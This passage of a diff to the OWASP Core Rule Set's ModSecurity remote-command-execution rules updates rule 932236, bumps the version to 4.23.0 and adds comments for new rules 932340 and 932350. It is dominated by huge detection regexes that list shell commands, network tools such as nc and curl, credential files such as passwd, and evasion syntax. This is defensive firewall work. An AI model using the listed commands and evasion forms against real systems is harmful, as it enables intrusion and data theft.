(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?e[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:[\s\x0b&\),<>\|].*|o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t)|[\n\r;=`\{]|\|\|?|&&?|\$(?:\(\(?|[\[\{])|<(?:\(|<<)|>\(|\([\s\x0b]*\))[\s\x0b]*(?:[\$\{]|(?:[\s\x0b]*\(|!)[\s\x0b]*|[0-9A-Z_a-z]+=(?:[^\s\x0b]*|\$(?:.*|.*)|[<>].*|'[^']*'|\"[^\"]*\")[\s\x0b]+)*[\s\x0b]*[\"']*(?:[\"'-\+\--9\?A-\]_a-z\|]+/)?[\"'\x5c]*(?:(?:7z[arx]?|(?:GE|POS)T|y(?:e(?:s|lp)|um|arn)|HEAD)[\s\x0b&\),<>\|]|a(?:a-[^\s\x0b]{1,10}\b|(?:b|w[ks]|l(?:ias|pine)|tobm|xel)[\s\x0b&\),<>\|]|p(?:t(?:[\s\x0b&\),<>\|]|-get)|parmor_[^\s\x0b]{1,10}\b)|r(?:(?:p|ch)?[\s\x0b&\),<>\|]|j(?:[\s\x0b&\),<>\|]|-register|disp)|ia2c)|s(?:h[\s\x0b&\),<>\|]|cii(?:-xfr|85)|pell)|dd(?:group|user)|getty|nsible|u(?:ditctl|repot|search))|b(?:z(?:(?:z|c(?:at|mp))[\s\x0b&\),<>\|]|diff|e(?:grep|xe[\s\x0b&\),<>\|])|f?grep|ip2(?:[\s\x0b&\),<>\|]|recover)|less|more)|a(?:s(?:e(?:32|64|n(?:ame[\s\x0b&\),<>\|]|c))|h[\s\x0b&\),<>\|])|tch[\s\x0b&\),<>\|])|lkid[\s\x0b&\),<>\|]|pftrace|r(?:eaksw|(?:idge|wap)[\s\x0b&\),<>\|])|sd(?:cat|iff|tar)|u(?:iltin|n(?:dler[\s\x0b&\),<>\|]|zip2)|s(?:ctl|ybox))|y(?:ebug|obu[\s\x0b&\),<>\|]))|c(?:[89]9(?:[\s\x0b&\),<>\|]|-gcc)|(?:a(?:t|ncel|psh)|c|mp)[\s\x0b&\),<>\|]|p(?:(?:an|io)?[\s\x0b&\),<>\|]|ulimit)|s(?:(?:h|cli)[\s\x0b&\),<>\|]|plit|vtool)|u(?:(?:t|rl)[\s\x0b&\),<>\|]|psfilter)|ertbot|h(?:(?:(?:att|di)r|mod|o(?:om|wn)|root|sh)[\s\x0b&\),<>\|]|e(?:ck_(?:by_ssh|cups|log|memory|raid|s(?:sl_cert|tatusfile))|f[\s\x0b&\),\-<>\|])|(?:flag|pas)s|g(?:passwd|rp[\s\x0b&\),<>\|]))|lang(?:\+\+|[\s\x0b&\),<>\|])|o(?:bc(?:[\s\x0b&\),<>\|]|run)|(?:lumn|m(?:m(?:and)?|p(?:oser|ress)))[\s\x0b&\),<>\|]|proc|w(?:say|think))|r(?:ash[\s\x0b&\),<>\|]|on(?:[\s\x0b&\),<>\|]|tab)))|d(?:(?:[dfu]|i(?:(?:alo)?g|r|ff)|a(?:sh|te)|vips)[\s\x0b&\),<>\|]|hclient|m(?:esg[\s\x0b&\),<>\|]|idecode|setup)|o(?:(?:as|ne)[\s\x0b&\),<>\|]|cker[\s\x0b&\),\-<>\|]|sbox)|pkg[\s\x0b&\),\-<>\|])|e(?:(?:[bd]|qn|s(?:h|ac)?|cho|fax|grep|macs|val)[\s\x0b&\),<>\|]|n(?:v(?:[\s\x0b&\),<>\|]|-update)|d(?:if|sw)[\s\x0b&\),<>\|])|x(?:(?:ec|p(?:and|(?:ec|or)t|r))?[\s\x0b&\),<>\|]|iftool)|2fsck|asy_install)|f(?:(?:c|g(?:rep)?|mt|etch|lock|unction)[\s\x0b&\),<>\|]|i(?:(?:n(?:d|ger)|sh)?[\s\x0b&\),<>\|]|le(?:[\s\x0b&\),<>\|]|test))|tp(?:[\s\x0b&\),<>\|]|stats|who)|acter|d(?:(?:find|isk)[\s\x0b&\),<>\|]|u?mount)|o(?:ld[\s\x0b&\),<>\|]|reach)|ping[\s\x0b&\),6<>\|])|g(?:c(?:c[^\s\x0b]{1,10}\b|ore[\s\x0b&\),<>\|])|(?:db|i(?:t|mp|nsh)|o|pg|awk|z(?:cat|exe|ip))[\s\x0b&\),<>\|]|e(?:m[\s\x0b&\),<>\|]|ni(?:e[\s\x0b&\),<>\|]|soimage)|t(?:cap|facl[\s\x0b&\),<>\|]))|hc(?:-?[\s\x0b&\),<>\|]|i[\s\x0b&\),\-<>\|])|r(?:(?:c(?:at)?|ep)[\s\x0b&\),<>\|]|oupmod)|tester|unzip)|h(?:(?:d|up|ash|i(?:ghlight|story))[\s\x0b&\),<>\|]|e(?:ad[\s\x0b&\),<>\|]|xdump)|ost(?:id|name)|ping3|t(?:digest|op[\s\x0b&\),<>\|]|passwd))|i(?:(?:d|rb|conv|nstall)[\s\x0b&\),<>\|]|p(?:[\s\x0b&\),<>\|]|6?tables|config|p(?:eveprinter|find|tool))|f(?:config|top[\s\x0b&\),<>\|])|onice|spell)|j(?:(?:js|q|ava|exec)[\s\x0b&\),<>\|]|o(?:(?:bs|in)[\s\x0b&\),<>\|]|urnalctl)|runscript)|k(?:s(?:h[\s\x0b&\),<>\|]|shell)|ill(?:[\s\x0b&\),<>\|]|all)|nife[\s\x0b&\),<>\|])|l(?:d(?:d?[\s\x0b&\),<>\|]|config)|(?:[np]|inks|ynx)[\s\x0b&\),<>\|]|s(?:(?:-F|cpu|hw|mod|of|pci|usb)?[\s\x0b&\),<>\|]|b_release)|ua(?:[\s\x0b&\),<>\|]|(?:la)?tex)|z(?:4(?:[\s\x0b&\),<>\|]|c(?:[\s\x0b&\),<>\|]|at))|(?:c(?:at|mp))?[\s\x0b&\),<>\|]|diff|[ef]?grep|less|m(?:a(?:[\s\x0b&\),<>\|]|dec|info)|ore))|a(?:st(?:(?:comm)?[\s\x0b&\),<>\|]|log(?:in)?)|tex[\s\x0b&\),<>\|])|ess(?:[\s\x0b&\),<>\|]|echo|(?:fil|pip)e)|ftp(?:[\s\x0b&\),<>\|]|get)|o(?:(?:ca(?:l|te)|ok)[\s\x0b&\),<>\|]|g(?:inctl|(?:nam|sav)e)|setup)|trace|wp-(?:d(?:ownload|ump)|mirror|request))|m(?:(?:a(?:n|il[qx]?|ke|wk)|tr|v|utt)[\s\x0b&\),<>\|]|k(?:(?:dir|nod)[\s\x0b&\),<>\|]|fifo|temp)|locate|o(?:squitto|unt[\s\x0b&\),<>\|])|sg(?:attrib|c(?:at|onv)|filter|merge|uniq)|ysql(?:[\s\x0b&\),<>\|]|admin|dump(?:slow)?|hotcopy|show))|n(?:c(?:(?:at)?[\s\x0b&\),<>\|]|\.(?:openbsd|traditional))|e(?:t(?:[\s\x0b&\),<>\|]|(?:c|st)at|kit-ftp|plan)|ofetch)|(?:l|m(?:ap)?|p(?:m|ing)|a(?:no|sm|wk)|ice|o(?:de|hup)|roff)[\s\x0b&\),<>\|]|s(?:enter|lookup|tat[\s\x0b&\),<>\|]))|o(?:(?:d|ctave)[\s\x0b&\),<>\|]|nintr|p(?:en(?:ssl|v(?:pn|t))|kg[\s\x0b&\),<>\|]))|p(?:a(?:(?:x|rted|tch)[\s\x0b&\),<>\|]|s(?:swd|te[\s\x0b&\),<>\|]))|d(?:b(?:[\s\x0b&\),<>\|]|2mb|3[\s\x0b&\),\.<>\|])|f(?:la)?tex|ksh[\s\x0b&\),<>\|])|(?:f(?:tp)?|g(?:rep)?|(?:w|op)d|xz|u(?:ppet|shd))[\s\x0b&\),<>\|]|hp(?:[57]?[\s\x0b&\),<>\|]|-cgi)|i(?:(?:co?|gz|ng6?)[\s\x0b&\),<>\|]|p(?:[\s\x0b&\),<>\|]|[^\s\x0b]{1,10}\b)|dstat)|k(?:g(?:[\s\x0b&\),<>\|]|_?info)|exec|ill[\s\x0b&\),<>\|])|r(?:y?[\s\x0b&\),<>\|]|int(?:env|f[\s\x0b&\),<>\|]))|t(?:x[\s\x0b&\),<>\|]|ar(?:[\s\x0b&\),<>\|]|diff|grep))|er(?:(?:f|ms)[\s\x0b&\),<>\|]|l(?:5?[\s\x0b&\),<>\|]|sh))|s(?:(?:ed|ql)[\s\x0b&\),<>\|]|ftp)|y(?:3?versions|thon(?:[23]|[^\s\x0b]{1,10}\b)))|r(?:(?:a(?:r|k[eu])|cp?|bash|nano|oute|vi(?:ew|m))[\s\x0b&\),<>\|]|e(?:(?:d(?:carpet)?|v|boot|name|p(?:eat|lace))[\s\x0b&\),<>\|]|a(?:delf|lpath)|stic)|m(?:(?:dir)?[\s\x0b&\),<>\|]|t(?:[\s\x0b&\),<>\|]|-(?:dump|tar))|user)|pm(?:(?:db)?[\s\x0b&\),<>\|]|(?:quer|verif)y)|l(?:ogin|wrap)|sync(?:-ssl|[\s\x0b&\),<>\|])|u(?:by[^\s\x0b]{1,10}\b|n(?:-(?:mailcap|parts)|c[\s\x0b&\),<>\|])))|s(?:(?:c(?:p|hed|r(?:een|ipt))|g|ash|diff|(?:ft|na)p|l(?:eep|sh)|plit)[\s\x0b&\),<>\|]|e(?:(?:d|ndmail|rvice)[\s\x0b&\),<>\|]|t(?:(?:facl)?[\s\x0b&\),<>\|]|arch|cap|env|sid))|h(?:(?:u(?:f|tdown))?[\s\x0b&\),<>\|]|\.distrib)|s(?:[\s\x0b&\),<>\|]|h(?:[\s\x0b&\),<>\|]|-(?:a(?:dd|gent)|copy-id|key(?:ge|sca)n)|pass))|u(?:[\s\x0b&\),<>\|]|do(?:-rs|[\s\x0b&\),<>_\|]|edit|replay))|vn(?:[\s\x0b&\),<>\|]|a(?:dmin|uthz)|bench|dumpfilter|fsfs|look|mucc|rdump|s(?:erve|ync)|version)|mbclient|o(?:(?:(?:ca|r)t|urce)[\s\x0b&\),<>\|]|elim)|qlite3|t(?:art-stop-daemon|dbuf|r(?:ace|ings[\s\x0b&\),<>\|]))|ys(?:ctl|tem(?:ctl|d-resolve)))|t(?:a(?:(?:[cr]|ilf?)[\s\x0b&\),<>\|]|sk(?:[\s\x0b&\),<>\|]|set))|(?:bl|o(?:p|uch)|ftp|mux)[\s\x0b&\),<>\|]|e(?:[ex][\s\x0b&\),<>\|]|lnet)|i(?:c[\s\x0b&\),<>\|]|me(?:datectl|out[\s\x0b&\),<>\|]))|c(?:l?sh[\s\x0b&\),<>\|]|p(?:dump|ing|traceroute))|r(?:a(?:ceroute6?|p[\s\x0b&\),<>\|])|off[\s\x0b&\),<>\|])|shark)|u(?:l(?:imit)?[\s\x0b&\),<>\|]|n(?:(?:ame|compress|iq|rar|s(?:et|hare)|xz)[\s\x0b&\),<>\|]|expand|l(?:ink[\s\x0b&\),<>\|]|z(?:4[\s\x0b&\),<>\|]|ma))|pigz|z(?:ip[\s\x0b&\),<>\|]|std))|pdate-alternatives|ser(?:(?:ad|mo)d|del)|u(?:de|en)code)|v(?:i(?:m(?:[\s\x0b&\),<>\|]|diff)|(?:[ep]w|gr|rsh)[\s\x0b&\),<>\|]|sudo(?:-rs)?)|algrind|olatility[\s\x0b&\),<>\|])|w(?:(?:3m|c|a(?:ll|tch)|get)[\s\x0b&\),<>\|]|h(?:iptail[\s\x0b&\),<>\|]|o(?:ami|is[\s\x0b&\),<>\|]))|i(?:reshark|sh[\s\x0b&\),<>\|]))|x(?:(?:(?:x|pa)d|args|term)[\s\x0b&\),<>\|]|z(?:(?:c(?:at|mp))?[\s\x0b&\),<>\|]|d(?:ec[\s\x0b&\),<>\|]|iff)|[ef]?grep|less|more)|e(?:latex|tex[\s\x0b&\),<>\|])|mo(?:dmap|re[\s\x0b&\),<>\|]))|z(?:ip(?:[\s\x0b&\),<>\|]|c(?:loak|mp)|details|grep|info|(?:merg|not)e|split|tool)|s(?:h[\s\x0b&\),<>\|]|oelim|td(?:[\s\x0b&\),<>\|]|(?:ca|m)t|grep|less))|athura|(?:c(?:at|mp)|diff|grep|less|run)[\s\x0b&\),<>\|]|[ef]grep|mo(?:dload|re[\s\x0b&\),<>\|])|ypper))" \ "id:932236,\ phase:2,\ block,\ @@ -1601,7 +1677,7 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)(? tag:'OWASP_CRS',\ tag:'OWASP_CRS/ATTACK-RCE',\ tag:'capec/1000/152/248/88',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" @@ -1621,6 +1697,8 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)(? # # .932250 (base rule, PL1, targets two and three character commands) # .932260 (base rule, PL1, targets known command word of length > 3 without evasion) +# .932340 (PL-1, matches commands with no arguments) +# .932350 (PL-3, matches commands with no arguments) # # .932240 (generic detection, PL2, targets generic evasion attempts) # .932236 (stricter sibling of 932230, 932235, 932250, 932260, PL2, @@ -1647,7 +1725,7 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)(? # (consult https://coreruleset.org/docs/development/regex_assembly/ for details): # crs-toolchain regex update 932239 # -SecRule REQUEST_HEADERS:User-Agent|REQUEST_HEADERS:Referer "@rx (?i)(?:^|b[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?s[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?y[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?b[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?x|(?:c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?d|e[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?v|v[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?l)|w[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?h)[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:[\s\x0b&\),<>\|]|$).*|[ls][\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?r[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?e|n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?h[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?p|t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?i[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?e[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:(?:[\s\x0b&\),<>\|]|$).*|o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t)|[\n\r;=`\{]|\|\|?|&&?|\$(?:\(\(?|[\[\{])|<(?:\(|<<)|>\(|\([\s\x0b]*\))[\s\x0b]*(?:[\$\{]|(?:[\s\x0b]*\(|!)[\s\x0b]*|[0-9A-Z_a-z]+=(?:[^\s\x0b]*|\$(?:.*|.*)|[<>].*|'[^']*'|\"[^\"]*\")[\s\x0b]+)*[\s\x0b]*[\"']*(?:[\"'-\+\--9\?A-\]_a-z\|]+/)?[\"'\x5c]*(?:7z(?:[\s\x0b&\),<>\|]|$|[arx](?:[\s\x0b&\),<>\|]|$))|a(?:a-[^\s\x0b]{1,10}\b|(?:b|w[ks]|l(?:ias|pine)|tobm|xel)(?:[\s\x0b&\),<>\|]|$)|p(?:t(?:[\s\x0b&\),<>\|]|$|-get)|parmor_[^\s\x0b]{1,10}\b)|r(?:[\s\x0b&\),<>\|]|$|j(?:[\s\x0b&\),<>\|]|$|-register|disp)|(?:p|ch)(?:[\s\x0b&\),<>\|]|$)|ia2c)|s(?:h(?:[\s\x0b&\),<>\|]|$)|cii(?:-xfr|85)|pell)|dd(?:group|user)|getty|nsible|u(?:ditctl|repot|search))|b(?:z(?:(?:z|c(?:at|mp))(?:[\s\x0b&\),<>\|]|$)|diff|e(?:grep|xe(?:[\s\x0b&\),<>\|]|$))|f?grep|ip2(?:[\s\x0b&\),<>\|]|$|recover)|less|more)|a(?:s(?:e(?:32|64|n(?:ame(?:[\s\x0b&\),<>\|]|$)|c))|h(?:[\s\x0b&\),<>\|]|$))|tch(?:[\s\x0b&\),<>\|]|$))|lkid(?:[\s\x0b&\),<>\|]|$)|pftrace|r(?:eaksw|(?:idge|wap)(?:[\s\x0b&\),<>\|]|$))|sd(?:cat|iff|tar)|u(?:iltin|n(?:dler(?:[\s\x0b&\),<>\|]|$)|zip2)|s(?:ctl|ybox))|y(?:ebug|obu(?:[\s\x0b&\),<>\|]|$)))|c(?:[89]9(?:[\s\x0b&\),<>\|]|$|-gcc)|(?:a(?:t|ncel|psh)|c|mp)(?:[\s\x0b&\),<>\|]|$)|p(?:[\s\x0b&\),<>\|]|$|io(?:[\s\x0b&\),<>\|]|$)|ulimit)|s(?:(?:h|cli)(?:[\s\x0b&\),<>\|]|$)|plit|vtool)|u(?:t(?:[\s\x0b&\),<>\|]|$)|psfilter)|ertbot|h(?:(?:(?:att|di)r|mod|o(?:om|wn)|root|sh)(?:[\s\x0b&\),<>\|]|$)|e(?:ck_(?:by_ssh|cups|log|memory|raid|s(?:sl_cert|tatusfile))|f(?:[\s\x0b&\),\-<>\|]|$))|(?:flag|pas)s|g(?:passwd|rp(?:[\s\x0b&\),<>\|]|$)))|lang(?:\+\+|[\s\x0b&\),<>\|]|$)|o(?:bc(?:[\s\x0b&\),<>\|]|$|run)|lumn(?:[\s\x0b&\),<>\|]|$)|m(?:m(?:[\s\x0b&\),<>\|]|$|and(?:[\s\x0b&\),<>\|]|$))|p(?:oser|ress)(?:[\s\x0b&\),<>\|]|$))|proc|w(?:say|think))|r(?:ash(?:[\s\x0b&\),<>\|]|$)|ontab))|d(?:(?:[dfu]|i(?:(?:alo)?g|ff)|ash|vips)(?:[\s\x0b&\),<>\|]|$)|hclient|m(?:esg(?:[\s\x0b&\),<>\|]|$)|idecode|setup)|o(?:(?:as|ne)(?:[\s\x0b&\),<>\|]|$)|cker(?:[\s\x0b&\),\-<>\|]|$)|sbox)|pkg(?:[\s\x0b&\),\-<>\|]|$))|e(?:(?:b|qn|cho|fax|grep|macs|val)(?:[\s\x0b&\),<>\|]|$)|n(?:v(?:[\s\x0b&\),<>\|]|$|-update)|d(?:if|sw)(?:[\s\x0b&\),<>\|]|$))|s(?:[\s\x0b&\),<>\|]|$|(?:h|ac)(?:[\s\x0b&\),<>\|]|$))|x(?:[\s\x0b&\),<>\|]|$|(?:ec|p(?:and|(?:ec|or)t|r))(?:[\s\x0b&\),<>\|]|$)|iftool)|2fsck|asy_install)|f(?:(?:c|mt|etch|lock|unction)(?:[\s\x0b&\),<>\|]|$)|d(?:[\s\x0b&\),<>\|]|$|(?:find|isk)(?:[\s\x0b&\),<>\|]|$)|u?mount)|g(?:[\s\x0b&\),<>\|]|$|rep(?:[\s\x0b&\),<>\|]|$))|i(?:[\s\x0b&\),<>\|]|$|letest|(?:n(?:d|ger)|sh)(?:[\s\x0b&\),<>\|]|$))|tp(?:[\s\x0b&\),<>\|]|$|stats|who)|acter|o(?:ld(?:[\s\x0b&\),<>\|]|$)|reach)|ping(?:[\s\x0b&\),6<>\|]|$))|g(?:c(?:c[^\s\x0b]{1,10}\b|ore(?:[\s\x0b&\),<>\|]|$))|(?:db|i(?:t|mp|nsh)|o|pg|awk|z(?:cat|exe|ip))(?:[\s\x0b&\),<>\|]|$)|e(?:m(?:[\s\x0b&\),<>\|]|$)|ni(?:e(?:[\s\x0b&\),<>\|]|$)|soimage)|t(?:cap|facl(?:[\s\x0b&\),<>\|]|$)))|hc(?:[\s\x0b&\),<>\|]|$|-(?:[\s\x0b&\),<>\|]|$)|i(?:[\s\x0b&\),\-<>\|]|$))|r(?:c(?:[\s\x0b&\),<>\|]|$|at(?:[\s\x0b&\),<>\|]|$))|ep(?:[\s\x0b&\),<>\|]|$)|oup(?:[\s\x0b&\),<>\|]|$|mod))|tester|unzip)|h(?:(?:d|up|i(?:ghlight|story))(?:[\s\x0b&\),<>\|]|$)|e(?:ad(?:[\s\x0b&\),<>\|]|$)|xdump)|ost(?:id|name)|ping3|t(?:digest|op(?:[\s\x0b&\),<>\|]|$)|passwd))|i(?:p(?:[\s\x0b&\),<>\|]|$|6?tables|config|p(?:eveprinter|find|tool))|(?:rb|conv)(?:[\s\x0b&\),<>\|]|$)|f(?:config|top(?:[\s\x0b&\),<>\|]|$))|onice|spell)|j(?:(?:js|q|exec)(?:[\s\x0b&\),<>\|]|$)|o(?:(?:bs|in)(?:[\s\x0b&\),<>\|]|$)|urnalctl)|runscript)|k(?:s(?:h(?:[\s\x0b&\),<>\|]|$)|shell)|ill(?:[\s\x0b&\),<>\|]|$|all)|nife(?:[\s\x0b&\),<>\|]|$))|l(?:d(?:[\s\x0b&\),<>\|]|$|d(?:[\s\x0b&\),<>\|]|$)|config)|(?:[np]|ynx)(?:[\s\x0b&\),<>\|]|$)|s(?:[\s\x0b&\),<>\|]|$|(?:-F|cpu|hw|mod|of|pci|usb)(?:[\s\x0b&\),<>\|]|$)|b_release)|ua(?:[\s\x0b&\),<>\|]|$|(?:la)?tex)|z(?:4(?:[\s\x0b&\),<>\|]|$|c(?:[\s\x0b&\),<>\|]|$|at))|(?:c(?:at|mp))?(?:[\s\x0b&\),<>\|]|$)|diff|[ef]?grep|less|m(?:a(?:[\s\x0b&\),<>\|]|$|dec|info)|ore))|a(?:st(?:[\s\x0b&\),<>\|]|$|comm(?:[\s\x0b&\),<>\|]|$)|log(?:in)?)|tex(?:[\s\x0b&\),<>\|]|$))|ess(?:[\s\x0b&\),<>\|]|$|echo|(?:fil|pip)e)|ftp(?:[\s\x0b&\),<>\|]|$|get)|o(?:(?:ca(?:l|te)|ok)(?:[\s\x0b&\),<>\|]|$)|g(?:inctl|(?:nam|sav)e)|setup)|trace|wp-(?:d(?:ownload|ump)|mirror|request))|m(?:a(?:(?:n|il[qx]|ke|wk)(?:[\s\x0b&\),<>\|]|$)|ster\.passwd)|(?:tr|v|utt)(?:[\s\x0b&\),<>\|]|$)|k(?:(?:dir|nod)(?:[\s\x0b&\),<>\|]|$)|fifo|temp)|locate|o(?:squitto|unt(?:[\s\x0b&\),<>\|]|$))|sg(?:attrib|c(?:at|onv)|filter|merge|uniq)|ysql(?:[\s\x0b&\),<>\|]|$|admin|dump(?:slow)?|hotcopy|show))|n(?:c(?:[\s\x0b&\),<>\|]|$|\.(?:openbsd|traditional)|at(?:[\s\x0b&\),<>\|]|$))|e(?:t(?:[\s\x0b&\),<>\|]|$|(?:c|st)at|kit-ftp|plan)|ofetch)|(?:l|p(?:m|ing)|a(?:no|sm|wk)|ice|o(?:de|hup)|roff)(?:[\s\x0b&\),<>\|]|$)|m(?:[\s\x0b&\),<>\|]|$|ap(?:[\s\x0b&\),<>\|]|$))|s(?:enter|lookup|tat(?:[\s\x0b&\),<>\|]|$)))|o(?:(?:d|ctave)(?:[\s\x0b&\),<>\|]|$)|nintr|p(?:en(?:ssl|v(?:pn|t))|kg(?:[\s\x0b&\),<>\|]|$)))|p(?:a(?:(?:x|rted|tch)(?:[\s\x0b&\),<>\|]|$)|s(?:swd|te(?:[\s\x0b&\),<>\|]|$)))|d(?:b(?:[\s\x0b&\),<>\|]|$|2mb|3(?:[\s\x0b&\),\.<>\|]|$))|f(?:la)?tex|ksh(?:[\s\x0b&\),<>\|]|$))|f(?:[\s\x0b&\),<>\|]|$|tp(?:[\s\x0b&\),<>\|]|$))|i(?:c(?:[\s\x0b&\),<>\|]|$|o(?:[\s\x0b&\),<>\|]|$))|p(?:[^\s\x0b]{1,10}\b|[\s\x0b&\),<>\|]|$)|dstat|(?:gz|ng6?)(?:[\s\x0b&\),<>\|]|$))|k(?:g(?:[\s\x0b&\),<>\|]|$|_?info)|exec|ill(?:[\s\x0b&\),<>\|]|$))|r(?:[\s\x0b&\),<>\|]|$|y(?:[\s\x0b&\),<>\|]|$)|int(?:env|f(?:[\s\x0b&\),<>\|]|$)))|t(?:x(?:[\s\x0b&\),<>\|]|$)|ar(?:[\s\x0b&\),<>\|]|$|diff|grep))|wd(?:[\s\x0b&\),<>\|]|$|\.db)|(?:xz|grep|opd|u(?:ppet|shd))(?:[\s\x0b&\),<>\|]|$)|er(?:(?:f|ms)(?:[\s\x0b&\),<>\|]|$)|l(?:5?(?:[\s\x0b&\),<>\|]|$)|sh))|hp(?:-cgi|[57](?:[\s\x0b&\),<>\|]|$))|s(?:(?:ed|ql)(?:[\s\x0b&\),<>\|]|$)|ftp)|y(?:3?versions|thon[23]))|r(?:(?:a(?:r|k[eu])|bash|nano|oute|vi(?:ew|m))(?:[\s\x0b&\),<>\|]|$)|c(?:[\s\x0b&\),<>\|]|$|p(?:[\s\x0b&\),<>\|]|$))|e(?:d(?:[\s\x0b&\),<>\|]|$|carpet(?:[\s\x0b&\),<>\|]|$))|(?:v|boot|place)(?:[\s\x0b&\),<>\|]|$)|a(?:delf|lpath)|stic)|m(?:[\s\x0b&\),<>\|]|$|t(?:[\s\x0b&\),<>\|]|$|-(?:dump|tar))|dir(?:[\s\x0b&\),<>\|]|$)|user)|pm(?:[\s\x0b&\),<>\|]|$|db(?:[\s\x0b&\),<>\|]|$)|(?:quer|verif)y)|l(?:ogin|wrap)|sync(?:-ssl|[\s\x0b&\)